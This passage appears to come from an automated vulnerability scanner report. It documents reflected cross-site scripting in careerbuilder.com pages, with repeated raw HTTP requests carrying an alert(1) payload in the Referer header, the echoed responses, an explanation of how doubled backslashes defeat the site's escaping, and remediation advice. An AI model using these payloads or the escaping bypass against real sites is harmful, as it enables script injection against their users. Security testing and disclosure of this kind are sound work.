Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=3c113\'%3balert(1)//a10bfebdfb8
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174679 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR7 Date: Sun, 14 Nov 2010 23:25:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 3c113\\';alert(1)//a10bfebdfb8'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5f22\'%3balert(1)//74a8307aa4f was submitted in the Referer HTTP header. This input was echoed as b5f22\\';alert(1)//74a8307aa4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=b5f22\'%3balert(1)//74a8307aa4f
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 175164 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:26:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b5f22\\';alert(1)//74a8307aa4f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14e00\'%3balert(1)//7496d02a115 was submitted in the Referer HTTP header. This input was echoed as 14e00\\';alert(1)//7496d02a115 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Management.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=14e00\'%3balert(1)//7496d02a115
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174942 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL10 Date: Sun, 14 Nov 2010 23:20:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 14e00\\';alert(1)//7496d02a115'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f717c\'%3balert(1)//431b53f18e was submitted in the Referer HTTP header. This input was echoed as f717c\\';alert(1)//431b53f18e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=f717c\'%3balert(1)//431b53f18e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174812 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR32 Date: Sun, 14 Nov 2010 23:26:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f717c\\';alert(1)//431b53f18e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80589\'%3balert(1)//7e390f9d8e4 was submitted in the Referer HTTP header. This input was echoed as 80589\\';alert(1)//7e390f9d8e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Payroll.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=80589\'%3balert(1)//7e390f9d8e4
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174595 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL5 Date: Sun, 14 Nov 2010 23:20:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 80589\\';alert(1)//7e390f9d8e4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8cd\'%3balert(1)//b7f3cbea5f9 was submitted in the Referer HTTP header. This input was echoed as 5a8cd\\';alert(1)//b7f3cbea5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=5a8cd\'%3balert(1)//b7f3cbea5f9
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174706 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR6 Date: Sun, 14 Nov 2010 23:27:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5a8cd\\';alert(1)//b7f3cbea5f9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d838\'%3balert(1)//ec2babe9869 was submitted in the Referer HTTP header. This input was echoed as 1d838\\';alert(1)//ec2babe9869 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Reporting.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=1d838\'%3balert(1)//ec2babe9869
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174828 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL33 Date: Sun, 14 Nov 2010 23:21:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1d838\\';alert(1)//ec2babe9869'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77750\'%3balert(1)//879e9ac1947 was submitted in the Referer HTTP header. This input was echoed as 77750\\';alert(1)//879e9ac1947 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=77750\'%3balert(1)//879e9ac1947
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174993 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR29 Date: Sun, 14 Nov 2010 23:29:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 77750\\';alert(1)//879e9ac1947'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50124\'%3balert(1)//0accddd36a4 was submitted in the Referer HTTP header. This input was echoed as 50124\\';alert(1)//0accddd36a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=50124\'%3balert(1)//0accddd36a4
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174984 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL33 Date: Sun, 14 Nov 2010 23:22:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 50124\\';alert(1)//0accddd36a4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45b43\'%3balert(1)//95a70c346c was submitted in the Referer HTTP header. This input was echoed as 45b43\\';alert(1)//95a70c346c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ac.ic/Florida_Miami/ HTTP/1.1 Host: admin-clerical.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=45b43\'%3balert(1)//95a70c346c
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182073 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=22764023ee034704bda5975aaa089352-343070667-RL-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650BF7DA71D67AF1CE5740F446FBFE0297659B2CAB9F3201DD65D60982B44534385A36E6117DAB244D2; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:27 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:39:27 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL21 Date: Sun, 14 Nov 2010 22:24:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 45b43\\';alert(1)//95a70c346c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
